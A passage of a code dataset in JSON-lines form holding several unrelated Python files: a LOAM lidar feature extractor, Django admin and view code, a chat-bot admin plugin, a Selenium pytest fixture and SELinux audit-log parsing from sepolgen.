sharp and flat points\n SURFACE_CURVATURE_THRESHOLD = 0.1\n # Radius of points for curvature analysis (S / 2 from original paper, 5A section)\n FEATURES_REGION = 5 # window length (10+1) for sharpness, 当前点的前后5个点\n\n # idx为0-1序列flag,0-不选,1-选取,可视化使用\n def selectedPC(self, pc, idx):\n # 基于idx flag生成list\n count=0\n ind=[]\n for i in idx:\n count+=i\n if i != 0:\n ind.append(int(count))\n pcd = o3d.geometry.PointCloud()\n pcd.points = o3d.utility.Vector3dVector(pc[:,:3])\n sel_pcd=pcd.select_by_index(ind)\n sel_pcd.paint_uniform_color([1.0,0,0])\n pcd.paint_uniform_color([0, 1, 0])\n #pc_show([sel_pcd])\n pc_show([pcd,sel_pcd])\n\n def extract_features(self, laser_cloud, scan_start, scan_end):\n keypoints_sharp = []\n keypoints_less_sharp = []\n keypoints_flat = []\n keypoints_less_flat = []\n\n cloud_curvatures = self.get_curvatures(laser_cloud) # 基于前后点,获取每个点平滑度/曲率\n\n cloud_label = np.zeros((laser_cloud.shape[0])) # empty labels for storing,初始化为0\n cloud_neighbors_picked = np.zeros((laser_cloud.shape[0]))\n # 剔除不可靠点,在遍历计算平滑度之后,拆分特征点之前。\n cloud_neighbors_picked = self.remove_unreliable(cloud_neighbors_picked, laser_cloud, scan_start, scan_end)\n #print(\"outliner:\",sum(cloud_neighbors_picked))\n # i=扫描线[0-63]; j=区块[0-5]; k=平滑度特征选取窗口[]\n for i in range(scan_end.shape[0]): # 1.基于扫描线遍历\n s = scan_start[i] + self.FEATURES_REGION # 预留出前5\n e = scan_end[i] - self.FEATURES_REGION - 1 # 提前结束,保障窗口最后还有5\n if e - s < self.N_SEGMENTS: # 越界保护\n continue\n # 0-5 一个ring拆分6等份操作, 2.基于子区间遍历\n for j in range(self.N_SEGMENTS):\n sp = s + (e - s) * j // self.N_SEGMENTS\n ep = s + (e - s) * (j + 1) // self.N_SEGMENTS - 1\n segments_curvatures = cloud_curvatures[sp:ep + 1] # 当前子环子段的连续11个平滑度值\n sort_indices = np.argsort(segments_curvatures) # 基于平滑度递增排序,平面在前 边在后\n '''\n 边特征筛选,先反向排序, 非平滑值在末端\n '''\n largest_picked_num = 0\n for k in reversed(range(ep - sp)):\n # print(ep,sp)\n if i < 45: # 边特征的选取范围仅考虑 45-64的扫描线? 针对kitti数出来不计算地面的点。\n break\n ind = sort_indices[k] + sp # 在当前点云帧的全局序号索引\n # 不在之前选取的点范围内 and 平滑度大于0.5 (论文是0.005,其它改版为0.1,需测试) and edge判断条件\n if cloud_neighbors_picked[ind] == 0 and cloud_curvatures[ind] > 0.5 and \\\n self.can_be_edge(laser_cloud, ind):\n largest_picked_num += 1\n if largest_picked_num <= self.PICKED_NUM_SHARP:\n keypoints_sharp.append(laser_cloud[ind]) # 添加边缘点\n keypoints_less_sharp.append(laser_cloud[ind]) # 添加边缘点\n cloud_label[ind] = 2\n elif largest_picked_num <= self.PICKED_NUM_LESS_SHARP: # keypoints_sharp 属于 keypoints_less_sharp\n keypoints_less_sharp.append(laser_cloud[ind]) # 添加边缘点\n cloud_label[ind] = 1\n else:\n break\n\n cloud_neighbors_picked = self.mark_as_picked(laser_cloud, cloud_neighbors_picked, ind) # 在已选择列表中标记\n #print(\"outliner+edge:\", sum(cloud_neighbors_picked))\n '''\n 面特征筛选, 使用原递增排序排序\n '''\n smallest_picked_num = 0\n for k in range(ep - sp):\n if i < 50: # 边特征的选取范围仅考虑 50-64的扫描线? 针对kitti数出在地面的扫描线,来不计算地面的点。\n break\n ind = sort_indices[k] + sp\n # 不在之前选取的点范围内 and 平滑度小于0.1\n if cloud_neighbors_picked[ind] == 0 and cloud_curvatures[ind] < self.SURFACE_CURVATURE_THRESHOLD:\n smallest_picked_num += 1\n cloud_label[ind] = -1\n keypoints_flat.append(laser_cloud[ind]) # 添加平面点\n\n if smallest_picked_num >= self.PICKED_NUM_FLAT:\n break\n\n cloud_neighbors_picked = self.mark_as_picked(laser_cloud, cloud_neighbors_picked, ind)\n #print(\"outliner+edge+planer:\", sum(cloud_neighbors_picked))\n # 增补面特征 less_flat, 没有限制上限(高达8w左右), 主要集中在地面,因为没有过滤扫描线\n # 这部分特征点并没有被 mark_as_picked\n for k in range(sp, ep + 1):\n # =0的点为未选取点(cloud_label初始默认全0) <0的点为平面点 and not 存在大间隙,前后遮挡物体,保证是一个确定的平面\n if cloud_label[k] <= 0 and cloud_curvatures[k] < self.SURFACE_CURVATURE_THRESHOLD \\\n and not self.has_gap(laser_cloud, k):\n keypoints_less_flat.append(laser_cloud[k])\n '''\n keypoints = utils.get_pcd_from_numpy(np.vstack(keypoints_flat))\n keypoints.paint_uniform_color([0, 1, 0])\n keypoints_2 = utils.get_pcd_from_numpy(np.vstack(keypoints_sharp))\n keypoints_2.paint_uniform_color([1, 0, 0])\n pcd = utils.get_pcd_from_numpy(laser_cloud)\n pcd.paint_uniform_color([0, 0, 1])\n #o3d.visualization.draw_geometries([keypoints])\n o3d.visualization.draw_geometries([keypoints, keypoints_2])\n '''\n return keypoints_sharp, keypoints_less_sharp, keypoints_flat, keypoints_less_flat\n '''\n c=1/|S||Xi| |Sum(Xi-Xj)|\n Xi与Xj差异越大,总的c越大,就是边特征 Edge/Sharp\n 反之,特征处于平面,差异不大,属于面特征 planer\n '''\n def get_curvatures(self, pcd):\n coef = [1, 1, 1, 1, 1, -10, 1, 1, 1, 1, 1]\n #coef = [1, -10, 1]\n assert len(coef) == 2 * self.FEATURES_REGION + 1\n discr_diff = lambda x: np.convolve(x, coef, 'valid') # 参数x,传入 f(x)=np.convolve() 进行计算\n x_diff = discr_diff(pcd[:, 0])\n #x_diff1 = discr_diff(pcd[:10, 0])\n y_diff = discr_diff(pcd[:, 1])\n z_diff = discr_diff(pcd[:, 2])\n curvatures = x_diff * x_diff + y_diff * y_diff + z_diff * z_diff\n #temp=pcd[self.FEATURES_REGION:-self.FEATURES_REGION]\n #temp1=np.linalg.norm(temp,axis=1) # sqrt(x^2+y^2+z^2)\n curvatures /= np.linalg.norm(pcd[self.FEATURES_REGION:-self.FEATURES_REGION], axis=1) * 10 # *S\n curvatures = np.pad(curvatures, self.FEATURES_REGION) # 前后0填充各5个数值,补齐到原pcd长度\n return curvatures\n\n # 在排除已选择的特征点的同时,还对其周围一定范围内的点进行排除,防止后续被选择\n # 但是这个排除还是基于扫描线的排除,而不是完整的空间距离\n def mark_as_picked(self, laser_cloud, cloud_neighbors_picked, ind):\n cloud_neighbors_picked[ind] = 1 # 当前点\n # ind 前后5个点序列 错位相减\n diff_all = laser_cloud[ind - self.FEATURES_REGION + 1:ind + self.FEATURES_REGION + 2] - \\\n laser_cloud[ind - self.FEATURES_REGION:ind + self.FEATURES_REGION + 1]\n # 距离差矩阵点乘==向量夹角\n sq_dist = matrix_dot_product(diff_all[:, :3], diff_all[:, :3])\n # 1:6\n for i in range(1, self.FEATURES_REGION + 1):\n if sq_dist[i + self.FEATURES_REGION] > 0.05:\n break\n cloud_neighbors_picked[ind + i] = 1\n # -5:0\n for i in range(-self.FEATURES_REGION, 0):\n if sq_dist[i + self.FEATURES_REGION] > 0.05:\n break\n cloud_neighbors_picked[ind + i] = 1\n\n return cloud_neighbors_picked\n # 非可靠点过滤\n '''\n 1.基于扫描线进行遍历,采用滑动固定窗口,注意边界;不是从第一个点开始+wind/2,和最后一个点-wind/2\n 2.对当前扫描线内,相邻点夹角为正(dot>0.1)判断距离; 防止点过密\n 3.基于点到传感器距离进行 赋权距离计算 ,仅考虑 赋权距离小于0.1的当前点的前5后1个点 \n '''\n def remove_unreliable(self, cloud_neighbors_picked, pcd, scan_start, scan_end):\n for i in range(scan_end.shape[0]): # 0-max ring number\n sp = scan_start[i] + self.FEATURES_REGION # 区间范围,兼顾前后窗口\n ep = scan_end[i] - self.FEATURES_REGION\n\n if ep - sp < self.N_SEGMENTS: # 当前扫描线数量足够拆分为 N_SEGMENTS 个子段,\n continue\n\n for j in range(sp + 1, ep):\n prev_point = pcd[j - 1][:3] # 上一点\n point = pcd[j][:3] # 当前点\n next_point = pcd[j + 1][:3] # 下一点\n # 当前点到下一个点的夹角,通过夹角来代替距离\n diff_next = np.dot(point - next_point, point - next_point) #\n # 两点构成向量的点乘,夹角>0;因为雷达扫描基本是有序的,大概率不会出现负值[90,180]的情况;进行下一步判断,防止特征点过于密集\n if diff_next > 0.1:\n depth1 = np.linalg.norm(point) # 点到到传感器距离\n depth2 = np.linalg.norm(next_point) # 到传感器距离\n # 小的做权重分母,大的做归一化分母\n if depth1 > depth2: # 当point的距离远时,用一个小于1的权重乘next_point,增大距离差。\n weighted_dist = np.sqrt(np.dot(point - next_point * depth2 / depth1,\n point - next_point * depth2 / depth1)) / depth2\n if weighted_dist < 0.1:\n cloud_neighbors_picked[j - self.FEATURES_REGION:j + 1] = 1 # 前5后1,7个点\n #sss=sum(cloud_neighbors_picked)\n #self.selectedPC(pcd, cloud_neighbors_picked)\n continue\n else:\n weighted_dist = np.sqrt(np.dot(point - next_point * depth1 / depth2,\n point - next_point * depth1 / depth2)) / depth1\n\n if weighted_dist < 0.1:\n cloud_neighbors_picked[j - self.FEATURES_REGION: j + self.FEATURES_REGION + 1] = 1 # 前5 后6\n #sss = sum(cloud_neighbors_picked)\n #self.selectedPC(pcd, cloud_neighbors_picked)\n continue\n # 向前判断,(|P1||P2|cos Theta)/ |P1|>0.0002\n diff_prev = np.dot(point - prev_point, point - prev_point)\n dis = np.dot(point, point)\n # 上一个点和下一个点到当前点的\n if diff_next > 0.0002 * dis and diff_prev > 0.0002 * dis:\n cloud_neighbors_picked[j] = 1\n #sss = sum(cloud_neighbors_picked)\n #self.selectedPC(pcd, cloud_neighbors_picked)\n #self.selectedPC(pcd, cloud_neighbors_picked)\n return cloud_neighbors_picked\n\n # (仅针对面特征)排除可能存在遮挡区域的特征,判断条件为 当前点与附近点(一个segment) 不存在巨大间距 0.54 m。\n def has_gap(self, laser_cloud, ind):\n diff_S = laser_cloud[ind - self.FEATURES_REGION:ind + self.FEATURES_REGION + 1, :3] - laser_cloud[ind, :3] # seg点-当前点\n sq_dist = matrix_dot_product(diff_S[:, :3], diff_S[:, :3]) # sq_dist=x^2+y^2+z^2\n gapped = sq_dist[sq_dist > 0.3] # 距离到当前点ind大于 0.548m=sqrt(0.3) 的点/ 夹角阈值\n if gapped.shape[0] > 0: # 存在间隙,潜在不稳定\n return True\n else:\n return False\n # (仅针对边特征)也是基于距离来判断前后点\n def can_be_edge(self, laser_cloud, ind):\n #curpc=laser_cloud[ind - self.FEATURES_REGION:ind + self.FEATURES_REGION, :3]\n #pcd = o3d.geometry.PointCloud()\n #pcd.points = o3d.utility.Vector3dVector(curpc[:, 0:3])\n #pc_show([pcd])\n diff_S = laser_cloud[ind - self.FEATURES_REGION:ind + self.FEATURES_REGION, :3] -\\\n laser_cloud[ind - self.FEATURES_REGION + 1:ind + self.FEATURES_REGION + 1, :3] # 当前点-下一个点,错位相减 p(k)-p(k+1)\n sq_dist = matrix_dot_product(diff_S[:, :3], diff_S[:, :3]) #\n gapped = laser_cloud[ind - self.FEATURES_REGION:ind + self.FEATURES_REGION, :3][sq_dist > 0.2] # x^2+y^2+z^2>0.2的点\n if len(gapped) == 0: # 夹角阈值都不超过 0.2\n return True\n else:\n # a=np.linalg.norm(gapped, axis=1) # 大于阈值点的范数\n # b=np.linalg.norm(laser_cloud[ind][:3]) # 当前点的1-范数\n return np.any(np.linalg.norm(gapped, axis=1) > np.linalg.norm(laser_cloud[ind][:3]))\n","sub_path":"LOAM/feature_extractor.py","file_name":"feature_extractor.py","file_ext":"py","file_size_in_byte":14771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"363931569","text":"from django.contrib import admin\r\n\r\nfrom .models import Client\r\nfrom .models import Layer\r\nfrom .models import Orchard\r\nfrom .models import Survey\r\nfrom .models import SurveyLayer\r\nfrom .models import Annotation\r\n\r\nclass OrchardInline(admin.StackedInline):\r\n model = Orchard\r\n\r\nclass SurveyInline(admin.StackedInline):\r\n model = Survey\r\n\r\nclass AnnotationInline(admin.StackedInline):\r\n model = Annotation\r\n\r\nclass SurveyLayersInline(admin.StackedInline):\r\n model = SurveyLayer\r\n\r\n\r\nclass ClientAdmin(admin.ModelAdmin):\r\n inlines = [ OrchardInline ]\r\n readonly_fields=('id',)\r\n\r\nclass OrchardAdmin(admin.ModelAdmin):\r\n inlines = [ SurveyInline ]\r\n readonly_fields=('id',)\r\n\r\nclass SurveyAdmin(admin.ModelAdmin):\r\n inlines = [ SurveyLayersInline, AnnotationInline ]\r\n readonly_fields=('id',)\r\n\r\n\r\nadmin.site.register(Annotation)\r\nadmin.site.register(SurveyLayer)\r\nadmin.site.register(Survey, SurveyAdmin)\r\nadmin.site.register(Orchard, OrchardAdmin)\r\nadmin.site.register(Layer)\r\nadmin.site.register(Client, ClientAdmin)\r\n\r\n\r\n","sub_path":"dataviewer/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"468526282","text":"import random\nfrom nonebot import on_startswith\nfrom nonebot.rule import to_me\nfrom nonebot.adapters.cqhttp import Bot, Event\nfrom game.utils.image import toImage\nfrom game.model import offline\nfrom game.kernel.account import check_account\nfrom game.utils.database import *\n\ntest_test = on_startswith(msg=\"测试\", rule=to_me(), priority=1)\ntest_broadcast = on_startswith(msg=\"广播\", rule=to_me(), priority=1)\ntest_admin = on_startswith(msg=\"admin\", rule=to_me(), priority=1)\n\n@test_test.handle()\nasync def test_handler(bot: Bot, event: Event, state: dict):\n user = await check_account(test_test,event)\n if not user.isAdmin:\n await test_test.finish(\"没有管理员权限!\", **{'at_sender': True})\n await test_test.finish(toImage(str(event.message).lstrip(\"测试 \")), **{'at_sender': True})\n\n@test_broadcast.handle()\nasync def broadcast_handler(bot: Bot, event: Event, state: dict):\n user = await check_account(test_broadcast,event)\n if not user.isAdmin:\n await test_broadcast.finish(\"没有管理员权限!\", **{'at_sender': True})\n msg = str(event.message).split(\"广播\")[1]\n offline.Offline.broadcast(user, msg)\n\n@test_admin.handle()\nasync def admin_handler(bot: Bot, event: Event, state: dict):\n user = await check_account(test_admin, event)\n if not user.isAdmin:\n await test_admin.finish(\"没有管理员权限!\", **{'at_sender': True})\n cursor = g_database.cursor()\n msg = str(event.message).split(\"admin\")[1]\n try:\n count = cursor.execute(msg)\n ret = \"执行成功\\n\"\n result = \"\"\n items = cursor.fetchall()\n for item in items:\n result += str(item) + \"\\n\"\n ret += toImage(result)\n except Exception as e:\n ret = \"执行失败\\n\" + toImage(str(e))\n finally:\n cursor.close()\n await test_test.finish(ret, **{'at_sender': True})","sub_path":"bot/src/plugins/game/kernel/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"11483232","text":"import pytest\nfrom selenium import webdriver\n\n\ndef pytest_addoption(parser):\n parser.addoption('--language', action='store', default=None,\n help=\"Choose language: ru, en, fr, ...\")\n\n\nlanguages = ['ar', 'ca', 'cs', 'da', 'de', 'en-gb', 'el', 'es', 'fi', 'fr', 'it',\n 'ko', 'nl', 'pl', 'pt', 'pt-br', 'ro', 'ru', 'sk', 'uk', 'zh-hans', 'en']\n\n\n@pytest.fixture(scope=\"function\")\ndef browser(request):\n lang_option = request.config.getoption(\"language\")\n if lang_option in languages:\n options = webdriver.ChromeOptions()\n user_language = request.config.getoption(\"language\")\n options.add_experimental_option('excludeSwitches', ['enable-logging'])\n options.add_experimental_option('prefs', {'intl.accept_languages': user_language})\n browser = webdriver.Chrome(options=options)\n else:\n raise pytest.UsageError(\"--language should be ru, en, fr, ... etc\")\n yield browser\n browser.quit()\n","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"242860511","text":"# Authors: Karl MacMillan \n#\n# Copyright (C) 2006 Red Hat \n# see file 'COPYING' for use and warranty information\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License as\n# published by the Free Software Foundation; version 2 only\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n#\n\nimport refpolicy\nimport access\nimport re\n\n# Convenience functions\n\ndef get_audit_msgs():\n \"\"\"Obtain all of the avc and policy load messages from the audit\n log. This function uses ausearch and requires that the current\n process have sufficient rights to run ausearch.\n\n Returns:\n string contain all of the audit messages returned by ausearch.\n \"\"\"\n import subprocess\n output = subprocess.Popen([\"/sbin/ausearch\", \"-m\", \"AVC,USER_AVC,MAC_POLICY_LOAD,DAEMON_START,SELINUX_ERR\"],\n stdout=subprocess.PIPE).communicate()[0]\n return output\n\ndef get_dmesg_msgs():\n \"\"\"Obtain all of the avc and policy load messages from /bin/dmesg.\n\n Returns:\n string contain all of the audit messages returned by dmesg.\n \"\"\"\n import subprocess\n output = subprocess.Popen([\"/bin/dmesg\"],\n stdout=subprocess.PIPE).communicate()[0]\n return output\n\n# Classes representing audit messages\n\nclass AuditMessage:\n \"\"\"Base class for all objects representing audit messages.\n\n AuditMessage is a base class for all audit messages and only\n provides storage for the raw message (as a string) and a\n parsing function that does nothing.\n \"\"\"\n def __init__(self, message):\n self.message = message\n self.header = \"\"\n\n def from_split_string(self, recs):\n \"\"\"Parse a string that has been split into records by space into\n an audit message.\n\n This method should be overridden by subclasses. Error reporting\n should be done by raise ValueError exceptions.\n \"\"\"\n for msg in recs:\n fields = msg.split(\"=\")\n if len(fields) != 2:\n if msg[:6] == \"audit(\":\n self.header = msg\n return\n else:\n continue\n \n if fields[0] == \"msg\":\n self.header = fields[1]\n return\n\n\nclass InvalidMessage(AuditMessage):\n \"\"\"Class representing invalid audit messages. This is used to differentiate\n between audit messages that aren't recognized (that should return None from\n the audit message parser) and a message that is recognized but is malformed\n in some way.\n \"\"\"\n def __init__(self, message):\n AuditMessage.__init__(self, message)\n\nclass PathMessage(AuditMessage):\n \"\"\"Class representing a path message\"\"\"\n def __init__(self, message):\n AuditMessage.__init__(self, message)\n self.path = \"\"\n\n def from_split_string(self, recs):\n AuditMessage.from_split_string(self, recs)\n \n for msg in recs:\n fields = msg.split(\"=\")\n if len(fields) != 2:\n continue\n if fields[0] == \"path\":\n self.path = fields[1][1:-1]\n return\n\nclass AVCMessage(AuditMessage):\n \"\"\"AVC message representing an access denial or granted message.\n\n This is a very basic class and does not represent all possible fields\n in an avc message. Currently the fields are:\n scontext - context for the source (process) that generated the message\n tcontext - context for the target\n tclass - object class for the target (only one)\n comm - the process name\n exe - the on-disc binary\n path - the path of the target\n access - list of accesses that were allowed or denied\n denial - boolean indicating whether this was a denial (True) or granted\n (False) message.\n\n An example audit message generated from the audit daemon looks like (line breaks\n added):\n 'type=AVC msg=audit(1155568085.407:10877): avc: denied { search } for\n pid=677 comm=\"python\" name=\"modules\" dev=dm-0 ino=13716388\n scontext=user_u:system_r:setroubleshootd_t:s0\n tcontext=system_u:object_r:modules_object_t:s0 tclass=dir'\n\n An example audit message stored in syslog (not processed by the audit daemon - line\n breaks added):\n 'Sep 12 08:26:43 dhcp83-5 kernel: audit(1158064002.046:4): avc: denied { read }\n for pid=2 496 comm=\"bluez-pin\" name=\".gdm1K3IFT\" dev=dm-0 ino=3601333\n scontext=user_u:system_r:bluetooth_helper_t:s0-s0:c0\n tcontext=system_u:object_r:xdm_tmp_t:s0 tclass=file\n \"\"\"\n def __init__(self, message):\n AuditMessage.__init__(self, message)\n self.scontext = refpolicy.SecurityContext()\n self.tcontext = refpolicy.SecurityContext()\n self.tclass = \"\"\n self.comm = \"\"\n self.exe = \"\"\n self.path = \"\"\n self.accesses = []\n self.denial = True\n\n def __parse_access(self, recs, start):\n # This is kind of sucky - the access that is in a space separated\n # list like '{ read write }'. This doesn't fit particularly well with splitting\n # the string on spaces. This function takes the list of recs and a starting\n # position one beyond the open brace. It then adds the accesses until it finds\n # the close brace or the end of the list (which is an error if reached without\n # seeing a close brace).\n found_close = False\n i = start\n if i == (len(recs) - 1):\n raise ValueError(\"AVC message in invalid format [%s]\\n\" % self.message)\n while i < len(recs):\n if recs[i] == \"}\":\n found_close = True\n break\n self.accesses.append(recs[i])\n i = i + 1\n if not found_close:\n raise ValueError(\"AVC message in invalid format [%s]\\n\" % self.message)\n return i + 1\n \n\n def from_split_string(self, recs):\n AuditMessage.from_split_string(self, recs) \n # FUTURE - fully parse avc messages and store all possible fields\n # Required fields\n found_src = False\n found_tgt = False\n found_class = False\n found_access = False\n \n for i in range(len(recs)):\n if recs[i] == \"{\":\n i = self.__parse_access(recs, i + 1)\n found_access = True\n continue\n elif recs[i] == \"granted\":\n self.denial = False\n \n fields = recs[i].split(\"=\")\n if len(fields) != 2:\n continue\n if fields[0] == \"scontext\":\n self.scontext = refpolicy.SecurityContext(fields[1])\n found_src = True\n elif fields[0] == \"tcontext\":\n self.tcontext = refpolicy.SecurityContext(fields[1])\n found_tgt = True\n elif fields[0] == \"tclass\":\n self.tclass = fields[1]\n found_class = True\n elif fields[0] == \"comm\":\n self.comm = fields[1][1:-1]\n elif fields[0] == \"exe\":\n self.exe = fields[1][1:-1]\n\n if not found_src or not found_tgt or not found_class or not found_access:\n raise ValueError(\"AVC message in invalid format [%s]\\n\" % self.message)\n \nclass PolicyLoadMessage(AuditMessage):\n \"\"\"Audit message indicating that the policy was reloaded.\"\"\"\n def __init__(self, message):\n AuditMessage.__init__(self, message)\n\nclass DaemonStartMessage(AuditMessage):\n \"\"\"Audit message indicating that a daemon was started.\"\"\"\n def __init__(self, message):\n AuditMessage.__init__(self, message)\n self.auditd = False\n\n def from_split_string(self, recs):\n AuditMessage.from_split_string(self, recs)\n if \"auditd\" in recs:\n self.auditd = True\n \n\nclass ComputeSidMessage(AuditMessage):\n \"\"\"Audit message indicating that a sid was not valid.\n\n Compute sid messages are generated on attempting to create a security\n context that is not valid. Security contexts are invalid if the role is\n not authorized for the user or the type is not authorized for the role.\n\n This class does not store all of the fields from the compute sid message -\n just the type and role.\n \"\"\"\n def __init__(self, message):\n AuditMessage.__init__(self, message)\n self.type = \"\"\n self.role = \"\"\n\n def from_split_string(self, recs):\n AuditMessage.from_split_string(self, recs)\n dict={}\n for i in recs:\n t = i.split('=')\n if len(t) < 2:\n continue\n dict[t[0]]=t[1]\n try:\n self.role = refpolicy.SecurityContext(dict[\"scontext\"]).role\n self.type = refpolicy.SecurityContext(dict[\"tcontext\"]).type\n except:\n raise ValueError(\"Split string does not represent a valid compute sid message\")\n def output(self):\n return \"role %s types %s;\\n\" % (self.role, self.type)\n \n# Parser for audit messages\n\nclass AuditParser:\n \"\"\"Parser for audit messages.\n\n This class parses audit messages and stores them according to their message\n type. This is not a general purpose audit message parser - it only extracts\n selinux related messages.\n\n Each audit messages are stored in one of four lists:\n avc_msgs - avc denial or granted messages. Messages are stored in\n AVCMessage objects.\n comput_sid_messages - invalid sid messages. Messages are stored in\n ComputSidMessage objects.\n invalid_msgs - selinux related messages that are not valid. Messages\n are stored in InvalidMessageObjects.\n policy_load_messages - policy load messages. Messages are stored in\n PolicyLoadMessage objects.\n\n These lists will be reset when a policy load message is seen if\n AuditParser.last_load_only is set to true. It is assumed that messages\n are fed to the parser in chronological order - time stamps are not\n parsed.\n \"\"\"\n def __init__(self, last_load_only=False):\n self.__initialize()\n self.last_load_only = last_load_only\n\n def __initialize(self):\n self.avc_msgs = []\n self.compute_sid_msgs = []\n self.invalid_msgs = []\n self.policy_load_msgs = []\n self.path_msgs = []\n self.by_header = { }\n \n # Low-level parsing function - tries to determine if this audit\n # message is an SELinux related message and then parses it into\n # the appropriate AuditMessage subclass. This function deliberately\n # does not impose policy (e.g., on policy load message) or store\n # messages to make as simple and reusable as possible.\n #\n # Return values:\n # None - no recognized audit message found in this line\n #\n # InvalidMessage - a recognized but invalid message was found.\n #\n # AuditMessage (or subclass) - object representing a parsed\n # and valid audit message.\n def __parse_line(self, line):\n rec = line.split()\n for i in rec:\n found = False\n if i == \"avc:\" or i == \"message=avc:\" or i == \"msg='avc:\":\n msg = AVCMessage(line)\n found = True\n elif i == \"security_compute_sid:\":\n msg = ComputeSidMessage(line)\n found = True\n elif i == \"type=MAC_POLICY_LOAD\":\n msg = PolicyLoadMessage(line)\n found = True\n elif i == \"type=AVC_PATH\":\n msg = PathMessage(line)\n found = True\n elif i == \"type=DAEMON_START\":\n msg = DaemonStartMessage(list)\n found = True\n \n if found:\n try:\n msg.from_split_string(rec)\n except ValueError:\n msg = InvalidMessage(line)\n return msg\n return None\n\n # Higher-level parse function - take a line, parse it into an\n # AuditMessage object, and store it in the appropriate list.\n # This function will optionally reset all of the lists when\n # it sees a load policy message depending on the value of\n # self.last_load_only.\n def __parse(self, line):\n msg = self.__parse_line(line)\n if msg is None:\n return\n\n # Append to the correct list\n if isinstance(msg, PolicyLoadMessage):\n if self.last_load_only:\n self.__initialize()\n elif isinstance(msg, DaemonStartMessage):\n # We initialize every time the auditd is started. This\n # is less than ideal, but unfortunately it is the only\n # way to catch reboots since the initial policy load\n # by init is not stored in the audit log.\n if msg.auditd and self.last_load_only:\n self.__initialize()\n self.policy_load_msgs.append(msg)\n elif isinstance(msg, AVCMessage):\n self.avc_msgs.append(msg)\n elif isinstance(msg, ComputeSidMessage):\n self.compute_sid_msgs.append(msg)\n elif isinstance(msg, InvalidMessage):\n self.invalid_msgs.append(msg)\n elif isinstance(msg, PathMessage):\n self.path_msgs.append(msg)\n\n # Group by audit header\n if msg.header != \"\":\n if self.by_header.has_key(msg.header):\n self.by_header[msg.header].append(msg)\n else:\n self.by_header[msg.header] = [msg]\n \n\n # Post processing will add additional information from AVC messages\n # from related messages - only works on messages generated by\n # the audit system.\n def __post_process(self):\n for value in self.by_header.values():\n avc = []\n path = None\n for msg in value:\n if isinstance(msg, PathMessage):\n path = msg\n elif isinstance(msg, AVCMessage):\n avc.append(msg)\n if len(avc) > 0 and path:\n for a in avc:\n a.path = path.path\n\n def parse_file(self, input):\n \"\"\"Parse the contents of a file object. This method can be called\n multiple times (along with parse_string).\"\"\"\n line = input.readline()\n while line:\n self.__parse(line)\n line = input.readline()\n self.__post_process()\n\n def parse_string(self, input):\n \"\"\"Parse a string containing audit messages - messages should\n be separated by new lines. This method can be called multiple\n times (along with parse_file).\"\"\"\n lines = input.split('\\n')\n for l in lines:\n self.__parse(l)\n self.__post_process()\n\n def to_role(self, role_filter=None):\n \"\"\"Return list of SELINUX_ERR messages matching the specified filter\n\n Filter out types that match the filer, or all roles\n\n Params:\n role_filter - [optional] Filter object used to filter the\n output.\n Returns:\n Access vector set representing the denied access in the\n audit logs parsed by this object.\n \"\"\"\n roles = []\n if role_filter:\n for selinux_err in self.compute_sid_msgs:\n if role_filter.filter(selinux_err):\n roles.append(selinux_err)\n return roles\n return self.compute_sid_msgs\n\n def to_access(self, avc_filter=None, only_denials=True):\n \"\"\"Convert the audit logs access into a an access vector set.\n\n Convert the audit logs into an access vector set, optionally\n filtering the restults with the passed in filter object.\n\n Filter objects are object instances with a .filter method\n that takes and access vector and returns True if the message\n should be included in the final output and False otherwise.\n\n Params:\n avc_filter - [optional] Filter object used to filter the\n output.\n Returns:\n Access vector set representing the denied access in the\n audit logs parsed by this object.\n \"\"\"\n av_set = access.AccessVectorSet()\n for avc in self.avc_msgs:\n if avc.denial != True and only_denials:\n continue\n if avc_filter:\n if avc_filter.filter(avc):\n av_set.add(avc.scontext.type, avc.tcontext.type, avc.tclass,\n avc.accesses, avc)\n else:\n av_set.add(avc.scontext.type, avc.tcontext.type, avc.tclass,\n avc.accesses, avc)\n return av_set\n\nclass TypeFilter:\n def __init__(self, regex):\n self.regex = re.compile(regex)\n\n def filter(self, avc):\n if self.regex.match(avc.scontext.type):\n return True\n if self.regex.match(avc.tcontext.type):\n return True\n return False\n\n\n","sub_path":"images/lenny64-peon/usr/share/python-support/python-sepolgen/sepolgen/audit.py","file_name":"audit.py","file_ext":"py","file_size_in_byte":17463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"245696087","text":"from django.contrib import messages\nfrom django.shortcuts import render\nfrom webapp.exceptions import PTPValueError\nfrom webapp.manager import address_manager\nfrom webapp.view import GlobalErrorHandler\n\n__author__ = 'Gao Lei'\n\n\n@GlobalErrorHandler\ndef address_home(request, method, description):\n return render(request, 'address/address_home.html', {\n 'method': method,\n 'description': description,\n })\n\n\n@GlobalErrorHandler\ndef address_detail(request):\n postal_codes_string = request.POST['postal_codes'].strip()\n postal_codes = {item.strip() for item in postal_codes_string.split(',') if item.strip()}\n\n if not postal_codes:\n raise PTPValueError('Please input the bus postal codes that you want to add.')\n\n address_manager.postal_code_existing_check(postal_codes)\n\n return render(request, 'address/address_detail.html', {\n 'postal_codes': postal_codes,\n })\n\n\n@GlobalErrorHandler\ndef address_handler(request):\n address_count = int(request.POST['address_count'].strip())\n\n addresses = []\n for i in range(address_count):\n postal_code = request.POST['postal_code_%d' % i].strip()\n block = request.POST['block_%d' % i].strip()\n street_name = request.POST['street_name_%d' % i].strip()\n longitude = request.POST['longitude_%d' % i].strip()\n latitude = request.POST['latitude_%d' % i].strip()\n\n address = [postal_code, block, street_name, longitude, latitude]\n\n addresses.append(address)\n\n sql_name = 